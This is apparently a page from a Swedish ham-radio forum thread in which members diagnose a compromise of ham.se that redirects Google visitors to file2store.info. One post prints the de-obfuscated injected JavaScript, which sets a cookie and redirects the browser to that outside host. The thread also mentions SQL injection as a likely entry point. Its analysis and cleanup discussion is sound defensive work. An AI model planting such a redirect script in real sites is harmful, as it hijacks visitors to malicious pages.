Ham.se utsatt för hackerattack - Page 2 - Ham.se

Martin Björnström · 2012-05-02, 15:48

Citat:

Ursprungligen skriven av esn

Nu har jag sniffat en session och kan konstatera att det är ham.se som är infekterat. Samma problem som förra gången.

Jag har precis testat och kan bekräfta felet igen. Sjukt irriterande.

SA0BUX · 2012-05-02, 17:56

Citat:

Ursprungligen skriven av Martin Björnström

Jag har precis testat och kan bekräfta felet igen. Sjukt irriterande.

Som sagt, läs dom länkar jag länkade till i mitt tidigare inlägg:
Ham.se utsatt för hackerattack

Martin Björnström · 2012-05-03, 14:14

Vi har tömt Datastore och kört verktygen. Men det verkar vara många sajter drabbade och jag har en känsla av att vi kommer diskutera detta vidare igen.

SA5BKE · 2012-05-10, 11:09

Hur går det med bortrensningen?

SA0BUX · 2012-05-11, 17:45

Verkar fortfarande vara problem, jag har inte haft tid att sätta mig in i detta men det verkar som det går att göra sql injection via forumet ifall man inte säkrat upp sqlservern.

SA5BKE · 2012-05-11, 19:44

Hoppas ingen har samma lösenord här som på annat håll. I så fall, byt på alla, med en gång!

Eric

Sparky · 2012-05-11, 23:22

Citat:

Ursprungligen skriven av SM7SEK

Det skumma är ju att man bara blir omdirigerad när man kommer från google. Går jag direkt in på ham.se har det aldrig skett någon omdirigering. Detta oavsett om jag klickar på länken i de mail som kommer om att tråden uppdaterats eller skriver in adressen manuellt alternativt via bokmärke.

Är det någon som blivit omdirigerad när man gått direkt mot adressen www.ham.se?

Ja, faktiskt. Under ett par veckors tid har jag sporadiskt blivit omdirigerad TILL Google när jag knappat in www.ham.se !!
Har dock aldrig fallit för frestelsen att där (i Google) klicka på någon länk till något över huvud taget (inte ens www.ham.se).
Jag kör IE ver 9.0.8112.16421 med Win7 pro.
Vad jag gjort är att stänga IE, öppnat den igen och via "säkerhet-ta bort webbhistorik" rensat historiken. Därefter åter stängt IE och kört CCleaner. Åtskilliga MB har då ytterligare rensats bort.
Sen försökt att igen att direkt-öppna www.ham.se och då lyckats komma fram utan omdirigeringar.
Detta med omdirigering TILL (obs TILL) Google har jag aldrig upplevt med någon annan webbadress, såvida det inte rört sig om en ren felstavning från mig vid inskrivningen av adressen i adressfältet.
Någon förklaring ??

Sparky

SA0BUX · 2012-05-12, 00:01

Det är en javascript kod som ligger på www.ham.se och som triggar ifall du klickar på en ham.se länk från google.

Det enda som fungerar är ifall man ordnar till problemet på källan dvs www.ham.se

Sparky · 2012-05-12, 00:22

Citat:

Ursprungligen skriven av SA0BUX

Det är en javascript kod som ligger på www.ham.se och som triggar ifall du klickar på en ham.se länk från google.

Det enda som fungerar är ifall man ordnar till problemet på källan dvs www.ham.se

Jag upprepar:
Klickade inte på någon länk i/från Google. Jag belv omdirigerad TILL
Google när jag angav adressen www.ham.se i adressfältet !
Frågan om en förklaring återstår....

Sparky

SA0BUX · 2012-05-12, 10:21

Sorry, var nog lite dimmig efter att ha sovit på soffan några timmar.

Har du Google som search provider och har "search in the address bar" så kan det kanske hända att browsern ibland inte lyckats slå upp www.ham.se och då i stället
provar en google sökning på det inskrivna.

Eller om man skriver fel, tex. www,ham,se

Man kan stänga av "search in the address bar" men jag vet inte hur Microsoft har tänkt sig man skall söka då, Firefox har både en "address bar" och ett sökfält och båda går att söka via.

Sparky · 2012-05-12, 12:01

Citat:

Ursprungligen skriven av SA0BUX

Sorry, var nog lite dimmig efter att ha sovit på soffan några timmar.

Har du Google som search provider och har "search in the address bar" så kan det kanske hända att browsern ibland inte lyckats slå upp www.ham.se och då i stället
provar en google sökning på det inskrivna.

Eller om man skriver fel, tex. www,ham,se

Man kan stänga av "search in the address bar" men jag vet inte hur Microsoft har tänkt sig man skall söka då, Firefox har både en "address bar" och ett sökfält och båda går att söka via.

Ja, där kan du ha en poäng !
Men man behöver ju inte ha ngn prioriterad "search provider" som default. Det går ju att knappa in Google i adressfältet (eller vilken annan sökmotor som helst), så kanske problemet löser sig om det nu är så som du säger, att browsern inte lyckas hitta adressen alla gåmger !
Tack för en användbar förklaring !
Någon mer som har upplevt samma sak ?

SM7CZR · 2012-05-12, 17:51

Har aldrig haft problem med Ham.se

SA5BKE · 2012-06-11, 23:22

Finns det några planer från den som driver ham.se att agera på detta?

Eric

SM5NFT · 2012-06-12, 06:58

Ja det vore bra. Det är irriterande när man googlat på något radiorelaterat och sedan i resultatet råkar klicka på en länk till ham.se. Man hamnar då på file2store och måste stänga av javascript i webbläsaren för att "komma loss".

SA7CBR · 2012-06-12, 16:15

Har heller inte märkt nåt med denna sidan!?

SA0BUX · 2012-06-13, 00:23

Om man inte lyckats rensa bort javaskriptet från servern så kan det betyda att den fortfarande har någon säkerhetslucka som gör att den blir infekterad igen.

Den nuvarande koden verkar ganska beskedlig men det finns ju risk att det planteras något
mera illvillligt skript på servern.

sa6bsp · 2012-06-16, 13:45

Samma problem här, när man går från en google länk till ham.se hoppar den till adressen File2Store.info - Your File Hosting
där det kommer upp bland annat unibet reklam.

SA0BUX · 2012-06-17, 12:25

http://sitecheck.sucuri.net/results/www.ham.se

SA0BUX · 2012-06-17, 13:16

Så här koden ut som ham.se skickar ut efter att jag "packat" upp den.

Kod:

function ipbcc(_0x601cx2, _0x601cx3) {
    var _0x601cx4 = new Date();
    _0x601cx4['setTime'](_0x601cx4['getTime']() + 86400000);
    var _0x601cx5 = '; expires=' + _0x601cx4['toGMTString']();
    document['cookie'] = _0x601cx2 + '=' + _0x601cx3 + _0x601cx5 + '; path=/'
};
ipbcc('vbsp', '1');
document['location'] = 'http://file2store.info/download.php?id=' + vbsp;

QRP · 2012-06-17, 16:41

Google har en diagnossida för just denna:

Google Safe Browsing diagnostic page for file2store.info

På Googles finns uppgifter om att koden skickar & smittar andra
hemsidor med olämpligt innehåll.

//QRP

SA5BKE · 2012-06-19, 07:04

Personligen känner jag mig inte så till freds med att "hänga" på ett forum med säkerhetshål. Nu har det gått 1,5 månad utan någon respons om planer på att göra något mer åt detta.

Det kanske är dags att hitta ett nytt forum? Jag såg att ESR hade en ny hemsida och kanske dess forum kan bli ett ham.se-alternativ.

Eric

SM7NZB · 2012-06-19, 10:03

Någon som kan hjälpa till med problemet?

Någon som kan vara teknisk konsult inom området.

Hör av er till mig: tommy (AT) bjornstrom.se

Vi måste stänga forumet om det anses osäkert och ingen vet hur "datastore"
intrånget går till.

/ Tommy

SM0VPJ · 2012-07-30, 10:04

Citat:

Ursprungligen skriven av SM7NZB

Någon som kan hjälpa till med problemet?

Någon som kan vara teknisk konsult inom området.

Hör av er till mig: tommy (AT) bjornstrom.se

Vi måste stänga forumet om det anses osäkert och ingen vet hur "datastore"
intrånget går till.

/ Tommy

Hej Tommy, hur gick det, fick ni stopp på eländet? Själv har jag inte märkt av dessa problem men har efter inläggen här låtit bli att klicka på länkar som google hittat och som leder till ham.se. Är problemet löst så man kan använda de länkar man får fram via google eller ska man avstå?

Hoppas problemet är löst.

// Janne

SA0BUX · 2012-08-05, 13:43

Jag tror man har lyckats åtgärda problemet, försökte gå via google träffar men nu blir det ingen redirect utan man kommer till rätt sida på www.ham.se

/L

SM3GUJ · 2013-04-18, 09:31

Citat:

Ursprungligen skriven av SA6BJE

Det verkar som skadlig kod tagit sig in på ham.se
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf

Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.

......
Kanske något för Admin att undersöka närmare.
......

Idag gjorde jag en sökning på Google, och fick resultat som gick till HAM.se.
När jag klickade på länken kom det upp reklam av den mest påträngande sorten. Man blir irriterad över att besväras av sådant man inte frågat efter.
Jag använder Firefox som web-läsare.

2012-05-12, 17:51	#37
SM7CZR Blev medlem: Feb 2006 Från: Lund Inlägg: 1606	Har aldrig haft problem med Ham.se __________________ - Ingvar -

2012-05-03, 14:14	#28
Martin Björnström Sheriff Blev medlem: Jul 2003 Från: Stockholm Ålder: 39 Inlägg: 83	Vi har tömt Datastore och kört verktygen. Men det verkar vara många sajter drabbade och jag har en känsla av att vi kommer diskutera detta vidare igen.

2012-05-10, 11:09	#29
SA5BKE Blev medlem: Jul 2009 Från: Norrköping Ålder: 32 Inlägg: 225	Hur går det med bortrensningen?

2012-05-11, 17:45	#30
SA0BUX Blev medlem: Aug 2011 Inlägg: 178	Verkar fortfarande vara problem, jag har inte haft tid att sätta mig in i detta men det verkar som det går att göra sql injection via forumet ifall man inte säkrat upp sqlservern.

2012-05-11, 19:44	#31
SA5BKE Blev medlem: Jul 2009 Från: Norrköping Ålder: 32 Inlägg: 225	Hoppas ingen har samma lösenord här som på annat håll. I så fall, byt på alla, med en gång! Eric

2012-05-12, 00:01	#33
SA0BUX Blev medlem: Aug 2011 Inlägg: 178	Det är en javascript kod som ligger på www.ham.se och som triggar ifall du klickar på en ham.se länk från google. Det enda som fungerar är ifall man ordnar till problemet på källan dvs www.ham.se

2012-05-12, 10:21	#35
SA0BUX Blev medlem: Aug 2011 Inlägg: 178	Sorry, var nog lite dimmig efter att ha sovit på soffan några timmar. Har du Google som search provider och har "search in the address bar" så kan det kanske hända att browsern ibland inte lyckats slå upp www.ham.se och då i stället provar en google sökning på det inskrivna. Eller om man skriver fel, tex. www,ham,se Man kan stänga av "search in the address bar" men jag vet inte hur Microsoft har tänkt sig man skall söka då, Firefox har både en "address bar" och ett sökfält och båda går att söka via.

2012-06-11, 23:22	#38
SA5BKE Blev medlem: Jul 2009 Från: Norrköping Ålder: 32 Inlägg: 225	Finns det några planer från den som driver ham.se att agera på detta? Eric

2012-06-12, 06:58	#39
SM5NFT Blev medlem: Jan 2005 Inlägg: 406	Ja det vore bra. Det är irriterande när man googlat på något radiorelaterat och sedan i resultatet råkar klicka på en länk till ham.se. Man hamnar då på file2store och måste stänga av javascript i webbläsaren för att "komma loss".

2012-06-12, 16:15	#40
SA7CBR Blev medlem: Jun 2012 Från: Harlösa Inlägg: 26	Har heller inte märkt nåt med denna sidan!?

2012-06-13, 00:23	#41
SA0BUX Blev medlem: Aug 2011 Inlägg: 178	Om man inte lyckats rensa bort javaskriptet från servern så kan det betyda att den fortfarande har någon säkerhetslucka som gör att den blir infekterad igen. Den nuvarande koden verkar ganska beskedlig men det finns ju risk att det planteras något mera illvillligt skript på servern.

2012-06-16, 13:45	#42
sa6bsp Blev medlem: Apr 2012 Inlägg: 1	Samma problem här, när man går från en google länk till ham.se hoppar den till adressen File2Store.info - Your File Hosting där det kommer upp bland annat unibet reklam.

2012-06-17, 12:25	#43
SA0BUX Blev medlem: Aug 2011 Inlägg: 178	http://sitecheck.sucuri.net/results/www.ham.se

2012-06-17, 16:41	#45
QRP Blev medlem: Jan 2005 Inlägg: 321	Google har en diagnossida för just denna: Google Safe Browsing diagnostic page for file2store.info På Googles finns uppgifter om att koden skickar & smittar andra hemsidor med olämpligt innehåll. //QRP

2012-06-19, 07:04	#46
SA5BKE Blev medlem: Jul 2009 Från: Norrköping Ålder: 32 Inlägg: 225	Personligen känner jag mig inte så till freds med att "hänga" på ett forum med säkerhetshål. Nu har det gått 1,5 månad utan någon respons om planer på att göra något mer åt detta. Det kanske är dags att hitta ett nytt forum? Jag såg att ESR hade en ny hemsida och kanske dess forum kan bli ett ham.se-alternativ. Eric

2012-06-19, 10:03	#47
SM7NZB Administrator Blev medlem: Jul 2003 Från: Göteborg Inlägg: 782	Någon som kan hjälpa till med problemet? Någon som kan vara teknisk konsult inom området. Hör av er till mig: tommy (AT) bjornstrom.se Vi måste stänga forumet om det anses osäkert och ingen vet hur "datastore" intrånget går till. / Tommy

2012-08-05, 13:43	#49
SA0BUX Blev medlem: Aug 2011 Inlägg: 178	Jag tror man har lyckats åtgärda problemet, försökte gå via google träffar men nu blir det ingen redirect utan man kommer till rätt sida på www.ham.se /L

Tråd
Visa utskriftsvänlig version Skicka denna sida som e-post